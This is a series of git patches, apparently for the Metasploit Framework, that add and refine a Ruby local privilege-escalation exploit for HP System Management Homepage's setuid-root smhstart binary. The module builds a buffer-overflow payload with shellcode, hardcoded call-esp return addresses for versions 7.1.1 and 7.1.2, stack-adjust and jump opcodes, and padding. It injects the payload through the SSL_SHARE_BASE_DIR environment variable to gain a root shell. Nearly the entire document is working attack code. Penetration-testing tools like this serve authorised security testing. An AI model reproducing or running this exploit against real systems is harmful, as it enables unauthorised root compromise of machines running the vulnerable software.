From 30111e3d8b810398f973ac02cf82cc136021a065 Mon Sep 17 00:00:00 2001 From: agix Date: Sun, 31 Mar 2013 13:04:34 +0200 Subject: [PATCH 1/4] hpsmh smhstart local exploit BOF --- modules/exploits/linux/local/hp_smhstart.rb | 89 +++++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 modules/exploits/linux/local/hp_smhstart.rb diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb new file mode 100644 index 0000000000..d6a52b92f6 --- /dev/null +++ b/modules/exploits/linux/local/hp_smhstart.rb @@ -0,0 +1,89 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/linux/priv' +require 'msf/core/exploit/local/linux_kernel' +require 'msf/core/exploit/local/linux' +require 'msf/core/exploit/local/unix' +require 'msf/core/exploit/exe' + +#load 'lib/msf/core/post/file.rb' +#load 'lib/msf/core/exploit/local/unix.rb' +#load 'lib/msf/core/exploit/local/linux.rb' +#load 'lib/msf/core/exploit/local/linux_kernel.rb' + +class Metasploit4 < Msf::Exploit::Local + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Post::Common + + include Msf::Exploit::Local::Linux + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'HP System Management Homepage Local Privilege Escalation', + 'Description' => %q{ + Versions of hpsmh <= 7.1.1 setuid root smhstart is vulnerable to local buffer overflow in SSL_SHARE_BASE_DIR env variable. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'agix' #@agixid + ], + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Payload' => + { + 'Space' => 227, + 'BadChars' => "\x00\x22" + }, + 'References' => + [ + ['OSVDB', '91812'] #not exactly but there is none... + ], + 'Targets' => + [ + [ 'Hpsmh 7.1.1', + { + 'Arch' => ARCH_X86, + 'CallEsp' => 0x080c86eb, #call esp + 'Offset' => 64 + } + ], + [ 'Hpsmh 7.1.2', + { + 'Arch' => ARCH_X86, + 'CallEsp' => 0x080c8b9b, #call esp + 'Offset' => 64 + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => "Mar 30 2013", + } + )) + register_options([ + OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ]) + ], self.class) + end + + def exploit + pl = payload.encoded + padding = rand_text_alpha(target['Offset']) + ret = [target['CallEsp']].pack('V') + exploit = Rex::Text.encode_base64("#{pl}#{ret}\xe8\x14\xff\xff\xff#{padding}") + cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' | base64 -d)") + puts cmd_exec("#{datastore['smhstartDir']}/smhstart") + end + +end From 7359151c1493e540f669260d123781f92d89ea5f Mon Sep 17 00:00:00 2001 From: agix Date: Tue, 2 Apr 2013 13:25:31 +0200 Subject: [PATCH 2/4] decrement esp to fix crash in the middle of shellcode --- modules/exploits/linux/local/hp_smhstart.rb | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb index d6a52b92f6..21c958cf28 100644 --- a/modules/exploits/linux/local/hp_smhstart.rb +++ b/modules/exploits/linux/local/hp_smhstart.rb @@ -41,7 +41,7 @@ class Metasploit4 < Msf::Exploit::Local ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86 ], - 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'SessionTypes' => [ 'shell' ], 'Payload' => { 'Space' => 227, @@ -57,17 +57,21 @@ class Metasploit4 < Msf::Exploit::Local { 'Arch' => ARCH_X86, 'CallEsp' => 0x080c86eb, #call esp - 'Offset' => 64 + 'Offset' => 58 } ], [ 'Hpsmh 7.1.2', { 'Arch' => ARCH_X86, 'CallEsp' => 0x080c8b9b, #call esp - 'Offset' => 64 + 'Offset' => 58 } ], ], + 'DefaultOptions' => + { + 'PrependSetuid' => true + }, 'DefaultTarget' => 0, 'DisclosureDate' => "Mar 30 2013", } @@ -81,9 +85,9 @@ class Metasploit4 < Msf::Exploit::Local pl = payload.encoded padding = rand_text_alpha(target['Offset']) ret = [target['CallEsp']].pack('V') - exploit = Rex::Text.encode_base64("#{pl}#{ret}\xe8\x14\xff\xff\xff#{padding}") + exploit = Rex::Text.encode_base64("#{pl}#{ret}\x81\xc4\x11\xff\xff\xff\xe9\x0e\xff\xff\xff#{padding}") cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' | base64 -d)") - puts cmd_exec("#{datastore['smhstartDir']}/smhstart") + cmd_exec("#{datastore['smhstartDir']}/smhstart") end end From 60dfece55c928c81cd0c4f55692e2b5c83250dd3 Mon Sep 17 00:00:00 2001 From: agix Date: Wed, 3 Apr 2013 13:46:56 +0200 Subject: [PATCH 3/4] add opcode description --- modules/exploits/linux/local/hp_smhstart.rb | 22 ++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb index 21c958cf28..3f3fda3b93 100644 --- a/modules/exploits/linux/local/hp_smhstart.rb +++ b/modules/exploits/linux/local/hp_smhstart.rb @@ -8,18 +8,9 @@ require 'msf/core' require 'rex' require 'msf/core/post/common' -require 'msf/core/post/file' -require 'msf/core/post/linux/priv' -require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' -require 'msf/core/exploit/local/unix' require 'msf/core/exploit/exe' -#load 'lib/msf/core/post/file.rb' -#load 'lib/msf/core/exploit/local/unix.rb' -#load 'lib/msf/core/exploit/local/linux.rb' -#load 'lib/msf/core/exploit/local/linux_kernel.rb' - class Metasploit4 < Msf::Exploit::Local include Msf::Exploit::EXE @@ -85,8 +76,17 @@ class Metasploit4 < Msf::Exploit::Local pl = payload.encoded padding = rand_text_alpha(target['Offset']) ret = [target['CallEsp']].pack('V') - exploit = Rex::Text.encode_base64("#{pl}#{ret}\x81\xc4\x11\xff\xff\xff\xe9\x0e\xff\xff\xff#{padding}") - cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' | base64 -d)") + exploit = pl + exploit << ret + exploit << "\x81\xc4\x11\xff\xff\xff" # add esp, 0xffffff11 + exploit << "\xe9\x0e\xff\xff\xff" # jmp => begining of pl + exploit << padding + exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better + id=cmd_exec("id -un") + if id!="hpsmh" + fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must to be hpsmh to exploit this") + end + cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)") cmd_exec("#{datastore['smhstartDir']}/smhstart") end From b947dc71e918b7cf041f1c8d57eb8df34871e0d0 Mon Sep 17 00:00:00 2001 From: agix Date: Wed, 3 Apr 2013 13:47:57 +0200 Subject: [PATCH 4/4] english :) "must be" --- modules/exploits/linux/local/hp_smhstart.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb index 3f3fda3b93..8920e8f580 100644 --- a/modules/exploits/linux/local/hp_smhstart.rb +++ b/modules/exploits/linux/local/hp_smhstart.rb @@ -84,7 +84,7 @@ class Metasploit4 < Msf::Exploit::Local exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better id=cmd_exec("id -un") if id!="hpsmh" - fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must to be hpsmh to exploit this") + fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this") end cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)") cmd_exec("#{datastore['smhstartDir']}/smhstart")